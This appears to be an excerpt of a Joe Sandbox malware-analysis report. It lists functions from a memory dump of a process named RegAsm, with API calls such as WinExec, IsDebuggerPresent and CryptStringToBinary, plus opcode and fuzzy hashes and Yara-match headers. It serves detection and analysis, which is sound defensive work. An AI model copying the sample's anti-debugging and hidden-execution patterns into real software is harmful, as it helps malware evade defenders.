                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationVolume
                                                                      • String ID: C:\
                                                                      • API String ID: 2039140958-3404278061
                                                                      • Opcode ID: 97c22a736139e3911d92e50279b4b2d161076827c1acffce5e3a0f6afb6726f9
                                                                      • Instruction ID: a7167dd5f6dcaca79aa8bae8c2332e0e10afd782a6877a38d487df3357db5a74
                                                                      • Opcode Fuzzy Hash: 97c22a736139e3911d92e50279b4b2d161076827c1acffce5e3a0f6afb6726f9
                                                                      • Instruction Fuzzy Hash: D0D002F1A11221BFB2609F29AC49DB77ADCEA496607190469BC89C2240E1A05D94CAB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00457A3A Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7664 457a3a-457a47 GetEnvironmentStringsW 7665 457a49-457a4a 7664->7665 7666 457a4b-457a5b call 457a88 call 4532ef 7664->7666 7670 457a60-457a66 7666->7670 7671 457a73-457a87 call 4529a4 FreeEnvironmentStringsW 7670->7671 7672 457a68-457a70 call 4409a0 7670->7672 7672->7671
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(?,0044A011), ref: 00457A3D
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,0044A011), ref: 00457A7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free
                                                                      • String ID:
                                                                      • API String ID: 3328510275-0
                                                                      • Opcode ID: 2b0685727c8171de773814f91d602a620f67dd648ccb32de6df32e5c1d7f1495
                                                                      • Instruction ID: 18535471c04b116fd5b6d97432ef9d3e82689ee57d6b51c3cd61f3382a8d7378
                                                                      • Opcode Fuzzy Hash: 2b0685727c8171de773814f91d602a620f67dd648ccb32de6df32e5c1d7f1495
                                                                      • Instruction Fuzzy Hash: ABE09B67A09A2137E211363A7C499AF1A5ACFC277AB15013BFC1056283EE594E0641BE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004529A4 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529BA
                                                                      • GetLastError.KERNEL32(?,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 0b82ea54d05a3f1ee944c50458815860b2ea8dd86904ec07870acde344d2c05b
                                                                      • Instruction ID: 0eda7edd8cad29e357ae79bfd7352963475fa98f26119a2b20a35611bd27aa5f
                                                                      • Opcode Fuzzy Hash: 0b82ea54d05a3f1ee944c50458815860b2ea8dd86904ec07870acde344d2c05b
                                                                      • Instruction Fuzzy Hash: 6AE08672601304AFDB112BA2EC087577A58AB44755F104027F60896262D6788D9497DC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041B45A Relevance: 1.8, APIs: 1, Instructions: 313COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: a93c30bf499882d887e73c67cb5297d985ab7c98187a8097f315520f267f486f
                                                                      • Instruction ID: bdd3f0ccfc96f7e296aba8c377e3d23e5b97ac7cffbdbc0f95cf6837d9e88221
                                                                      • Opcode Fuzzy Hash: a93c30bf499882d887e73c67cb5297d985ab7c98187a8097f315520f267f486f
                                                                      • Instruction Fuzzy Hash: 7FC1FAB1A05B009FD724DF2AC88066BF7E5FF88714F14892EE5AA83790D774E844CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00431572 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 1531683806-0
                                                                      • Opcode ID: d386a6f3c86037b41da7221441825155686cec61cde337f121622378e9b21ae7
                                                                      • Instruction ID: 27c0b2f9c7d22cb3b7c0b9e865ab8ba2c208abfa7b038a0302c47942df8cb4cf
                                                                      • Opcode Fuzzy Hash: d386a6f3c86037b41da7221441825155686cec61cde337f121622378e9b21ae7
                                                                      • Instruction Fuzzy Hash: E00156A5A0820177C6145B58D8454AF7BD0DBC8350F24982BF447C7375E129CC45DB5B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045B797 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004532EF: RtlAllocateHeap.NTDLL(00000000,004525E9,?,?,004525E9,00000220,?,?,?), ref: 00453321
                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,00407493,778182B0,00002BFA,?,00407493,?,?), ref: 0045B7F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 893656418fcb7ad6d82adaf54530498189d0b7057a0ac4741378f42478481797
                                                                      • Instruction ID: ec6c4fbd0ce1f308f4f683eece0ae6c2026f7e97531aa2a066d39e4e901c4c73
                                                                      • Opcode Fuzzy Hash: 893656418fcb7ad6d82adaf54530498189d0b7057a0ac4741378f42478481797
                                                                      • Instruction Fuzzy Hash: 7AF0C8316011057BD7222A23EC45B6B2718DFC5BB7F11002BFC1496293EB2CD80991EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00454AB0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00407D71,?,00451999,00000001,00000364,00407D71,00000006,000000FF,?,0044CAD6,?,0040103B,?,00000000), ref: 00454AF1
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 12a2a842729759fea2c48161febabcb296c15b5b2824023144b7cfaf729b0798
                                                                      • Instruction ID: 5e98d373e1e1f474a2c54cf50db67855681b7e13bf73b929c967896598654ceb
                                                                      • Opcode Fuzzy Hash: 12a2a842729759fea2c48161febabcb296c15b5b2824023144b7cfaf729b0798
                                                                      • Instruction Fuzzy Hash: 7AF0593568122477DBA29B239C01B1B3748AFC177EB154027FC05AF282CA68DC8983ED
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004532EF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,004525E9,?,?,004525E9,00000220,?,?,?), ref: 00453321
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 1f0db84fc47fc2ae10e562a5081a66fdd9b7a4443acd2dfb35c85110bfd68399
                                                                      • Instruction ID: 6c40969103cae06692a820334a9e74d192653667edfb4226e4dd7ec3d2c61166
                                                                      • Opcode Fuzzy Hash: 1f0db84fc47fc2ae10e562a5081a66fdd9b7a4443acd2dfb35c85110bfd68399
                                                                      • Instruction Fuzzy Hash: B4E0ED31601321A7EB222E669C00B5F7A489F823E7F150023FC14A62D3DE68CE0981EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 0042DFE8 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 474stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcat
                                                                      • String ID: (y$)y$=9$=9$=9
                                                                      • API String ID: 4038537762-2863778377
                                                                      • Opcode ID: 699dfa8de57b4e630f379f8f3af181bbebb7cf6e108238e2b8f4a1d17e4332ad
                                                                      • Instruction ID: a01d586738fab6d36dd311ac60379023b39767bbc3c0d047e88aa62bc877231a
                                                                      • Opcode Fuzzy Hash: 699dfa8de57b4e630f379f8f3af181bbebb7cf6e108238e2b8f4a1d17e4332ad
                                                                      • Instruction Fuzzy Hash: E302E4B1F002399BDF249B9AE8455BEBAB0BB14304FA44527E505F7350D3B98D428B8F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043D47B Relevance: 10.9, APIs: 1, Strings: 6, Instructions: 428stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,26CFC4F5), ref: 0043D728
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: +'$Pcz$Qcz$Qcz$xG%$xG%
                                                                      • API String ID: 1586166983-1734303390
                                                                      • Opcode ID: ad97e9d5edd009b0154bf96a5036f2167802bfe5b6ad1fa798ebf42c7e4577ef
                                                                      • Instruction ID: 78dcd21af2e934441e6f0f72bbb9ee940cfed6c9c5cd960a2e368182b7187c67
                                                                      • Opcode Fuzzy Hash: ad97e9d5edd009b0154bf96a5036f2167802bfe5b6ad1fa798ebf42c7e4577ef
                                                                      • Instruction Fuzzy Hash: 69F1E6B1D042058FDF24DFA9E69567EBBB0AB5C304F24692BD411EB354D338D9418B8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004385E8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 191encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 004385F4
                                                                      • CryptStringToBinaryA.CRYPT32(?,?,00000001,00000000,?,00000000,00000000), ref: 004386D5
                                                                      • CryptStringToBinaryA.CRYPT32(?,?,00000001,?,?,00000000,00000000), ref: 0043882E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: BinaryCryptString$_strlen
                                                                      • String ID: f)=$f)=$f)=
                                                                      • API String ID: 1460654939-3239493788
                                                                      • Opcode ID: 3768d0ba1d79f93974c98df71ae00ea1d33972123062a6bbdcb446aa48f17d87
                                                                      • Instruction ID: 67648f8f89f50bb548e9c5a368245b33285c31b206c0a0f73294f34fa6fbd83d
                                                                      • Opcode Fuzzy Hash: 3768d0ba1d79f93974c98df71ae00ea1d33972123062a6bbdcb446aa48f17d87
                                                                      • Instruction Fuzzy Hash: AE6108715083418FDB2C9F1988A693AF6E5AF8C310F14291FF0978B756EE298D40CB1B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004539C4 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: a6632ade1995beb075dd88f61667e30aa9f1e077b41d4a83e1c0e8035da170e8
                                                                      • Instruction ID: d454fde4b0e431bc46012eeb63442076e03693121bf2b9da907b90a480b68ce7
                                                                      • Opcode Fuzzy Hash: a6632ade1995beb075dd88f61667e30aa9f1e077b41d4a83e1c0e8035da170e8
                                                                      • Instruction Fuzzy Hash: AAB14A729042459FDB168F68C8817EFBBA5EF45386F14816BEC41AB343C23D9E09C768
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045673C Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004567D7
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00456852
                                                                      • FindClose.KERNEL32(00000000), ref: 00456874
                                                                      • FindClose.KERNEL32(00000000), ref: 00456897
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: f25b88605f52710332cfae11e9b843b3a1a4fbba311c7e7e8da9d71ba93403b2
                                                                      • Instruction ID: 8b0da4b9bfc504da1d380c87494fb49714051dd50cc85109b86bfdf10fd8a82b
                                                                      • Opcode Fuzzy Hash: f25b88605f52710332cfae11e9b843b3a1a4fbba311c7e7e8da9d71ba93403b2
                                                                      • Instruction Fuzzy Hash: C241E871D011199FDF20EF65DC8C9ABB7B8EF4430AF5141EAE805D7141E7349E888B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043E955 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043E961
                                                                      • IsDebuggerPresent.KERNEL32 ref: 0043EA2D
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043EA4D
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0043EA57
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 381a44997a6f57153f68903a917f027c39002164ad81e2409e84c2a85d1bf844
                                                                      • Instruction ID: 35b7e69d133bc725499141d598fbc0553dbff569e30cd22927b4a02c2121b63c
                                                                      • Opcode Fuzzy Hash: 381a44997a6f57153f68903a917f027c39002164ad81e2409e84c2a85d1bf844
                                                                      • Instruction Fuzzy Hash: 25312DB5D0621CDBDB20EF65DD897CDBBB8BF08344F1040AAE40DA7250EB745A888F45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00456688 Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00454AB0: RtlAllocateHeap.NTDLL(00000008,00000000,00407D71,?,00451999,00000001,00000364,00407D71,00000006,000000FF,?,0044CAD6,?,0040103B,?,00000000), ref: 00454AF1
                                                                      • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004567D7
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00456852
                                                                      • FindClose.KERNEL32(00000000), ref: 00456874
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$AllocateCloseFirstHeapNext
                                                                      • String ID:
                                                                      • API String ID: 2963102669-0
                                                                      • Opcode ID: 53a4970f0ea21eeb2e1aa2807180d6e4d91208a02a19ef0500c9f54cdf3ebf9f
                                                                      • Instruction ID: 6575ffb03d334438a4ec444ca5f8e836226271d413ba8502ee658bae3d2b0299
                                                                      • Opcode Fuzzy Hash: 53a4970f0ea21eeb2e1aa2807180d6e4d91208a02a19ef0500c9f54cdf3ebf9f
                                                                      • Instruction Fuzzy Hash: F3415876600209AFDB14AFA9CC859BFB36DEF8435EF55416FFC0593242EB389D088658
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041D7E3 Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 349fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041D990
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0041DAB6
                                                                      • CloseHandle.KERNEL32(?), ref: 0041DAC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: 1&&i$69XX$<$[-/M$[-/M$_wJl$`wJl$qBhf$s^Xr$t^Xr$t^Xr
                                                                      • API String ID: 1065093856-280051200
                                                                      • Opcode ID: 885dfd0dfc23e53d5586b687a8bbb163712548c56f67b2fccf257f5eca458970
                                                                      • Instruction ID: 0e4d292689cfe946ab1050dcee9e216066ee5cd1885c82bfb41214e9cdfdfc58
                                                                      • Opcode Fuzzy Hash: 885dfd0dfc23e53d5586b687a8bbb163712548c56f67b2fccf257f5eca458970
                                                                      • Instruction Fuzzy Hash: ADC11AF1E083009BD7288F0C98556EE7AE4AB40714F25492FE4A9DB390D67CC9C59B9B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00460803 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 147COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004616EF), ref: 0046081C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DecodePointer
                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt$uC
                                                                      • API String ID: 3527080286-3203642613
                                                                      • Opcode ID: f16e9df3e327c4a47c3b048521f9b1b83bff4748b3070507c4a7938265b8e41a
                                                                      • Instruction ID: e0ca3da9a991257f9b30091a5541bf685b88736b1fd37591910fe8ee6827177d
                                                                      • Opcode Fuzzy Hash: f16e9df3e327c4a47c3b048521f9b1b83bff4748b3070507c4a7938265b8e41a
                                                                      • Instruction Fuzzy Hash: 24518EB0A00A0ADBEB149F69D9481AFBF75FB05314F108057D491A7215F77C899ACB8F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00458DED Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00459299: CreateFileW.KERNEL32(00000000,00000000,?,00458E96,?,?,00000000,?,00458E96,00000000,0000000C), ref: 004592B6
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00458F01
                                                                      • __dosmaperr.LIBCMT ref: 00458F08
                                                                      • GetFileType.KERNEL32(00000000), ref: 00458F14
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00458F1E
                                                                      • __dosmaperr.LIBCMT ref: 00458F27
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00458F47
                                                                      • CloseHandle.KERNEL32(00459CA3), ref: 00459094
                                                                      • GetLastError.KERNEL32 ref: 004590C6
                                                                      • __dosmaperr.LIBCMT ref: 004590CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID:
                                                                      • API String ID: 4237864984-0
                                                                      • Opcode ID: 9c75e4ea69f1de327a1ee9192fa1f7ce69edf1773f4ea12bdd8e6b856d7a157e
                                                                      • Instruction ID: b3593fe5fd176021bb839290586ea033522097fb5ed7f3fbcd2c802d51f91fa6
                                                                      • Opcode Fuzzy Hash: 9c75e4ea69f1de327a1ee9192fa1f7ce69edf1773f4ea12bdd8e6b856d7a157e
                                                                      • Instruction Fuzzy Hash: 53A14532A141149FDF189F68DC52BAE3BA1AB0A325F14015EFC01EF392DB389D4AD749
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045E9DF Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0045EAFE
                                                                      • CatchIt.LIBVCRUNTIME ref: 0045EC5D
                                                                      • _UnwindNestedFrames.LIBCMT ref: 0045ED5E
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0045ED79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 2332921423-393685449
                                                                      • Opcode ID: 307687c2bf95f4793ebbb6ba3639b362139db8633acb6cc974bcf4c607f81f1a
                                                                      • Instruction ID: 76ba0b8fd835995c0a8fdb15a3f38207f390cdc0cf8ed4be3d414a1ba4d98901
                                                                      • Opcode Fuzzy Hash: 307687c2bf95f4793ebbb6ba3639b362139db8633acb6cc974bcf4c607f81f1a
                                                                      • Instruction Fuzzy Hash: D9B18B75800209EFCF29DFA6C9819AFB7B5BF04316B14405BEC056B213D339EA59CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041F383 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: file
                                                                      • API String ID: 4218353326-2359244304
                                                                      • Opcode ID: 46c5df542c07cedf630a06839910b65fd577a157e9201059638bf19e73625d9c
                                                                      • Instruction ID: 650e67a085a4ae7a19ea8171e4a38fad5c7c0a5c04cbc226620e1393fc25770c
                                                                      • Opcode Fuzzy Hash: 46c5df542c07cedf630a06839910b65fd577a157e9201059638bf19e73625d9c
                                                                      • Instruction Fuzzy Hash: 6981D7B6900211AFD710DF55EC82A577BB4EF59318B18446DFC489B303E234A955CBEB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00431BB8 Relevance: 12.3, APIs: 8, Instructions: 299processfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00431C10
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00431C55
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00431C65
                                                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00431C7B
                                                                      • WinExec.KERNEL32 ref: 00431D19
                                                                      • CloseHandle.KERNEL32(?), ref: 00431E93
                                                                      • GetFileSizeEx.KERNEL32(?,?), ref: 00431FC6
                                                                      • ExitProcess.KERNEL32 ref: 00432087
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$HandleModuleProcess$CloseCreateCurrentExecExitNameSize
                                                                      • String ID:
                                                                      • API String ID: 3992844039-0
                                                                      • Opcode ID: 2052e1f72971bb33b1d50ba3aa614d502cfc9ae8472e57305392b68d2f276446
                                                                      • Instruction ID: d2da1656b6d0da2ae8ba17994311d3e41752677f13b2366e4fd01478c74c19f6
                                                                      • Opcode Fuzzy Hash: 2052e1f72971bb33b1d50ba3aa614d502cfc9ae8472e57305392b68d2f276446
                                                                      • Instruction Fuzzy Hash: B0B129B09007009BDB389F25CD85A27B6E4EB58714F109A2FE556C66F1E378F8058B6B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401CFF Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 395COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: %1.17g$[,]{: }$false$null$true
                                                                      • API String ID: 4218353326-762322047
                                                                      • Opcode ID: a5c252052bcb0491f776e6ef14947f4a9bd6010c39f943c73514e5bfa4adce70
                                                                      • Instruction ID: 76e9c130bd2493d05f383d8de23842c15a61669e225ce4d3f1d8dc90b9e9fbb8
